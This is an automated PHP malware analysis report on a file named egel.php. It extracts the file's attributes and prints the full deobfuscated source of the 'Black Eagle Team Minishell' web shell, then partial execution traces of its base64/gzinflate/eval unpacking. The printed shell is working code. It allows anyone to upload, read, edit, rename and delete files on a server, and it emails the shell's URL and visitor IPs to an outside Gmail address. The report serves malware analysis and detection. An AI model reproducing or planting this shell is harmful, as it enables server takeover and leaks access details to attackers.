PHP Malware Analysis
egel.php
md5: 9c8806c7c1505baab7b6f88581d8df1f
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- alfredofernandezbutar@gmail.com (Deobfuscated, Traces)
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
Title
- ' . $sname . ' (Deobfuscated)
- \'.$sname.\' (Traces)
- Black Eagle Team Minishell (HTML)
URLs
- http://localhost/uploads/egel.php (Traces)
- https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js (Deobfuscated, HTML, Traces)
- https://colorlib.com/preview/theme/satner/img/banner/home-right.png (Deobfuscated, HTML, Traces)
- https://fonts.googleapis.com/css?family=VT323 (Deobfuscated, HTML, Traces)
- https://i.postimg.cc/PJYNcNJ4/BET.jpg (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
/*
By: MR.P4UL / Bo0G3yM4n
IG: @blackeagleteam.id
Mau Ngapain Cukk Mau Recode Yah!
Eitss Tidak Bisa
*/
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
eval /* PHPDeobfuscator eval output */ {
/*
Black Eagle Team Shell v2
By : Bo0G3yM4n
Thanks To : Black Eagle Team, Dark Clown Security
Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v
Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$sname = "Black Eagle Team Minishell";
$__gcdir = "getcwd";
$__fgetcon7s = "file_get_contents";
$__scdir = "scandir";
$rm__dir = "rmdir";
$un__link = "unlink";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE html>
<html>
<head>
<meta name="robots" content"noindex. nofollow">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>' . $sname . '</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body>';
echo '<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>' . $sname . '</center></h1></div>';
if (isset($_GET['path'])) {
$path = $_GET['path'];
chdir($_GET['path']);
} else {
$path = $__gcdir();
}
$path = str_replace("\\", "/", $path);
$paths = explode("/", $path);
echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
echo "<font style='font-size:13px;'>Path: ";
foreach ($paths as $id => $pat) {
echo "<a style='font-size:13px;' href='?path=";
for ($i = 0; $i <= $id; $i++) {
echo $paths[$i];
if ($i != $id) {
echo "/";
}
}
echo "'>{$pat}</a>/";
}
echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/><input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<center><font color=\"#00ff00\">Upload Berhasil!!</font></center><br/>";
} else {
echo "<center><font color=\"red\">Upload Gagal!!</font></center><br/>";
}
}
echo "</td></tr><tr><td></table><div class=\"table-div\"></div><input id=\"image\" type=\"hidden\">";
echo "";
if (isset($_GET['filesrc'])) {
echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
echo "" . basename($_GET['filesrc']);
"";
echo "</tr></td></table><br />";
echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>";
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
} else {
echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
} else {
echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
}
fclose($fp);
}
echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';
}
echo "</center>";
} else {
echo "</table><br /><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if ($rm__dir($_POST['path'])) {
echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
} else {
echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
}
} elseif ($_POST['type'] == 'file') {
if ($un__link($_POST['path'])) {
echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
} else {
echo "<font color=\"red\">Delete File Error.</font><br />";
}
}
}
echo "</center>";
$_scdir = $__scdir($path);
echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"> <th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th> <th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
foreach ($_scdir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
if (is_writable("{$path}/{$dir}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$dir}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
foreach ($_scdir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
if (is_writable("{$path}/{$file}")) {
echo "<font color=\"#00ff00\">";
} elseif (!is_readable("{$path}/{$file}")) {
echo "<font color=\"red\">";
}
echo perms("{$path}/{$file}");
if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
echo "</font>";
}
echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\"> <input type=\"submit\" value=\">>\" /></form></center></td></tr>";
}
echo "</table></div>";
}
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
echo "<br><center>© <span id=\"footer\"></span> 2020 Black Eagle Team</center><br>";
echo "</body></html><!-- EOF -->";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$to = 'alfredofernandezbutar@gmail.com';
$f31337 = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$fie = "Akses {$f31337} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
exit;Execution traces
data/traces/9c8806c7c1505baab7b6f88581d8df1f_trace-1676260328.6917.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:52:34.589534]
1 0 1 0.000188 393512
1 3 0 0.000310 398376 {main} 1 /var/www/html/uploads/egel.php 0 0
1 A /var/www/html/uploads/egel.php 8 $p3mu14 = 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
1 A /var/www/html/uploads/egel.php 9 $arif = '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
2 4 0 0.000407 398376 base64_decode 0 /var/www/html/uploads/egel.php 10 1 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
2 4 1 0.000438 398568
2 4 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2 5 0 0.000467 398536 urldecode 0 /var/www/html/uploads/egel.php 10 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2 5 1 0.000492 398696
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2 6 0 0.000529 398504 htmlspecialchars_decode 0 /var/www/html/uploads/egel.php 10 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2 6 1 0.000555 398536
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2 7 0 0.000601 400912 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));' /var/www/html/uploads/egel.php 10 0
3 8 0 0.000647 400912 strrev 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
3 8 1 0.000692 405040
3 8 R 'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
3 9 0 0.000737 405008 base64_decode 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
3 9 1 0.000789 409136
3 9 R '\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3 10 0 0.000923 405008 gzinflate 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 '\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3 10 1 0.001059 408112
3 10 R '\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3 11 0 0.001189 403984 gzinflate 0 /var/www/html/uploads/egel.php(10) : eval()'d code 1 1 '\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3 11 1 0.001314 407088
3 11 R '\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s��\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
